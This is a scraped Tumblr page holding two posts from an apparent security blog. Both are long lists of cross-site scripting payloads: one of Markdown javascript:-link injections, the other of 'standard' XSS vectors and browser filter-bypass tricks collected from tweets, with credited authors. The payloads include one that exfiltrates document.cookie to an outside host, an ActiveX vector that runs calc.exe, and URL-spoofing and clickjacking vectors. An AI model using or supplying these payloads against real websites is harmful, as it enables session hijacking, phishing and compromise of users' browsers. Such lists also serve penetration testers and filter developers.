Don't wanna be here? Send us removal request.
Statistics
We looked inside some of the posts by zoczus-blog and here's what we found interesting.
Average Info
Notes Per Post
2
Likes Per Post
2
Reblog Per Post
0
Reply Per Post
0
Time Between Posts
3 months
Number of Posts By Type
Text
3
Link
1
Last Seen Tumblr Blogs
Fun Fact
Mobile Tumblr US users spend an average of 4.04 minutes per session on the app.
Text
Markdownn
a [a](j a v a s c r i p t:prompt(document.cookie)) \ <javascript:prompt(document.cookie)> <javascript:alert('XSS')> \ a a \ notmalicious test test notmalicious notmalicious a clickme http://[email protected] style=background-image:url(data:image/png;base64,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);background-repeat:no-repeat;display:block;width:100%;height:100px; onclick=alert(unescape(/Oh%20No!/.source));return(false);// <http://\<meta\ http-equiv=\"refresh\"\ content=\"0;\ url=http://danlec.com/\">> text a [a](javascript:this;alert(1)) [a](javascript:this;alert(1)) [a](Javascript:alert(1)) [a](javascript:alert(1)) [a](javascript:confirm(1) a a a javascript:alert(document.domain))[a](
0 notes
Link
STANDARD XSS VECTORS: < script > < / script> < < < < < << <<< ">" <script>alert("XSS") <alert("XSS");//< alert(document.cookie) '>alert(document.cookie) '>alert(document.cookie); ";alert('XSS');// %3cscript%3ealert("XSS");%3c/script%3e %3cscript%3ealert(document.cookie);%3c%2fscript%3e %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E <script>alert(document.cookie); <script>alert(document.cookie);<script>alert alert('XSS') alert("XSS")"> '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E ">document.location='http://your.site.com/cgi-bin/cookie.cgi?'???.cookie %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//>!--alert(String.fromCharCode(88,83,83))=&{} '';!--"=&{()} ','')); phpinfo(); exit;/* <![CDATA[var n=0;while(true){n;}]]> <![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]> <![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]> <![CDATA[]]> <IMG SRC="javascript:alert('XSS')"> ▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉ TWITTER @xssvector Tweets: Opera cross-domain set cookie 0day: document.cookie='xss=jackmasa;domain=.me.' Reverse 401 basic auth phishing by @jackmasa POC: document.domain='com' chrome/safari same domain suffix cross-domain trick. Safari empty location bar bug by @jackmasa POC: Safari location object pollution tech: by @kinugawamasato Safari URL spoofing about://mmme.me POC: Opera URL spoofing vuln data://mmme.me by @jackmasa POC: Universal URL spoofing data:;//mmme.me/view/1#1,2 #firefox #safari #opera New dom xss vector xxx.innerHTML=document.title by @0x6D6172696F Opera data:message/rfc822 #XSS by @insertScript #IE
IE cool expression xss
Clever webkit xss auditor bypass trick <scRipt %00>prompt(/@soaj1664ashar/) IE xss filter bypass 0day : <xml:namespace prefix=t><import namespace=t implementation=..... by @gainover1 #IE #0day <iframe srcdoc='<svg/onload=alert(/@80vul/)>'> #chrome IE xss filter bypass 0day :<script/%00%00v%00%00>alert(/@jackmasa/) and %c0″//(%000000%0dalert(1)// #IE #0day new XMLHttpRequest().open("GET", "data:text/html,", false); #firefox #datauri
XSS
*:after{content:url()} #firefox alert(/@ma1/) #IE "clickme #IE #xssfilter @kinugawamasato Components.lookupMethod(self, 'alert')(1) #firefox external.NavigateAndFind(' ',[],[]) #IE #URLredirect IE decides charset as #utf-7 @hasegawayosuke #opera #chrome MsgBox"@insertScript"<i> #IE9 #svg #vbscript setTimeout(['alert(/@garethheyes/)']); #chrome #safari #firefox <svg></ y="><x" onload=alert('@0x6D6172696F')> #svg Event.prototype[0]='@garethheyes',Event.prototype.length=1;Event.prototype.toString=[].join;onload=alert #webkit #opera URL-redirect vuln == XSS ! Location:data:text/html,<svg/onload=alert(document.domain)> #Opera @jackmasa <a href="data:application/x-x509-user-cert;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">click #Chrome #XSS @RSnake Clipboard-hijack without script and css: http://elgoog.com Opera:*{-o-link:'data:text/html,<svg/onload=alert(/@garethheyes/)>';-o-link-source:current}aaa $=<>@mozilla.org/js/function>;$::[<>alert>](/@superevr/) #firefox Firefox cookie xss: with(document)cookie='∼≩≭≧∯≳≲≣∽≸≸∺≸∠≯≮≥≲≲≯≲∽≡≬≥≲≴∨∱∩∾',write(cookie); by @jackmasa location=<>javascript:alert(1)<!/> #Firefox #JustForFun Just don't support IE click //<!-- -->*{x:expression(alert(/@jackmasa/))}// #IE #XSS Input[hidden] XSS target it. Firefox clipboard-hijack without script and css : http:// <![ #E4X <{alert(1)}>{alert(2)}>.(alert(3)).@wtf.(wtf) by @garethheyes #vbscript coool feature chr(&H4141)="A", Chr(7^5)=A and Chr(&O41) =‘A’ by @masa141421356 ({})[$='\143\157\156\163\164\162\165\143\164\157\162'][$]('\141\154\145\162\164\50/ @0x6D6172696F /\51')() No referer :
/**/alert(' @0x6D6172696F ')//*/ #VBScript Event Handling: [Sub XXX_OnError MsgBox " @0x6D6172696F " End Sub] if(1)alert(' @jackmasa ')}{ works in firebug and webkit's console alert(1) #opera by @soaj1664ashar <![if<iframe/onload=vbs::alert[:]> #IE by @0x6D6172696F, @jackmasa <svg><script/XL:href= data:;;;base64;;;;,<>啊YWx啊lc啊nQ啊oMSk啊=> mix! #opera by @jackmasa <! XSS="><img src=xx:x onerror=alert(1)//"> #Firefox #Opera #Chrome #Safari #XSS document.body.innerHTML=('<\000\0i\000mg src=xx:x onerror=alert(1)>') #IE #XSS header('Refresh: 0;url=javascript:alert(1)'); <script language=vbs> click #CSS expression *{font-family:'Serif}';x[value=expression(alert(URL=1));]{color:red} #ES #FF for(location of ['javascript:alert(/ff/)']); #E4X function::['location']='javascript'':alert(/FF/)' HTML5 entity char test #Firefox click eval(test'') by @cgvwzq
CSS and CSS :P toUpperCase XSS document.write('<ı onclıck=alert(1)>asdı>'.toUpperCase()) by @jackmasa IE6-8,IE9(quick mode) with jQuery<1.7 $("button").val("
") by @masa141421356 aha alert(/IE|Opera/) Opera bug? Use 127.1 no 127.0.0.1 by @jackmasa IE vector location='vbscript:alert(1)' #jQuery super less-xss,work in IE: $(URL) 6 chars #Bootstrap tooltip.js xss some other plugins (e.g typeahead,popover) are also the same problem //cc @twbootstrap innerText DOM XSS: innerHTML=innerText Using IE XSS filter or Chrome xss auditor to block url redirect. jQuery 1.8 a new method: $.parseHTML('') IE all version CSRF vector Timing vector Firefox data uri can inherit dom-access.
IE9 Webkit and FF Firefox E4X vector alert(<xss>xs{[function::status]}s) it is said E4H would replace E4X :P IE8 document.write('<img src="<iframe/onload=alert(1)>\0">') If you want to share your cool vector, please do not hesitate to let me know :) ASP trick: ?input1=<script/&in%u2119ut1=>al%u0117rt('1') by @IRSDL New spec:<iframe srcdoc="<svg/onload=alert(domain)>"> #chrome 20 by @0x6D6172696F #Firefox syntax broken try{*}catch(e if(alert(1))){} by @garethheyes JSON XSS Tips: /json.cgi?a.html by @hasegawayosuke JSON XSS Tips: /json/.html with PHP and .NET by or /json;.html with JSP by @superevr ß=ss <a href="http://ß.lv">click
by @_cweb click by @_cweb Firefox link host dom xss https://t.co/aTtzHaaG by @garethheyes click by @_cweb history.pushState([],[],'/xssvector') HTML5 URL spoofing! Clickjacking with history.forward() and history.back() by @lcamtuf Inertia-Clickjacking for(i=10;i>1;i--)alert(i);new ActiveXObject("WScript.shell").Run('calc.exe',1,true); by @80vul XHTML Entity Hijacking [<!ENTITY nbsp "'">] by @masa141421356 Firefox IE by @0x6D6172696F H5SC#115 Firefox funny vector for(i=0;i<100;) find(); by @garethheyes IE breaking framebusting vector var location={}; IE JSON hijack with UTF-7 json={'x':'',x:location='1'} Firefox
; with drag and drop form hijacking Dangling markup injection Firefox click=>google by @garethheyes click by @kkotowicz Opera click variant base64 encode. by @jackmasa Opera by LeverOne H5SC#88 Webkit and Opera click by @kkotowicz FF click url trick by @jackmasa IE -{valueOf:location,toString:[].pop,0:'vbscript:alert%281%29',length:1} @thornmaker , @sirdarckcat IE less xss,20 chars. by @0x6D6172696F click no referrer by @sneak_ FF no referrer by @sneak_ No dos expression vector by @jackmasa *{font-family:'<svg onload=alert(1)>';} by @0x6D6172696F JSLR( @garethheyes ) challenge result: @irsdl challenge result: Vbscript XHR by @masa141421356 XML Entity XSS by @garethheyes Webkit cross-domain and less vector! example: (JSFiddle cross to JSBin) by @jackmasa @import//evil? >>>steal me!<<< scriptless by @garethheyes IE <input value="<script>alert(1)" ` /> by @hasegawayosuke <xmp><img alt="<img src=xx:x onerror=alert(1)//"> Classic vector by slacker :D <a href="#" onclick="alert(' ');alert(2 ')">name Classic html entity inject vector A nice opera xss: Put 65535 Bytes before and Unicode Sign by @insertScript <iframe src="jar://html5sec.org/test.jar!/test.html">
Upload a jar file => Firefox XSS by @0x6D6172696F JS Array Hijacking with MBCS encodings ppt by @hasegawayosuke IE6-7 Inject vector by @kinugawamasato IE UTF7 BOM XSS by @garethheyes a='<svg/onload=alert(1)>';alert(2) by @0x6D6172696F , @jackmasa Opera SVG animation vector by @0x6D6172696F a='x酄刓';alert(1)//'; by @garethheyes FF CLICK by @0x6D6172696F
non-IE by @0x6D6172696F Firefox statusline spoofing<math><maction actiontype="statusline#http://google.com" href="//evil">click by LeverOne <svg><oooooo/oooooooooo/onload=alert(1) > by @jackmasa <math><script>sgl='<img/src=xx:x onerror=alert(1)>' chrome firefox opera vector by @jackmasa FF by @jackmasa Nice IE DOM XSS:
d.innerHTML=鈥樷€
2 notes
·
View notes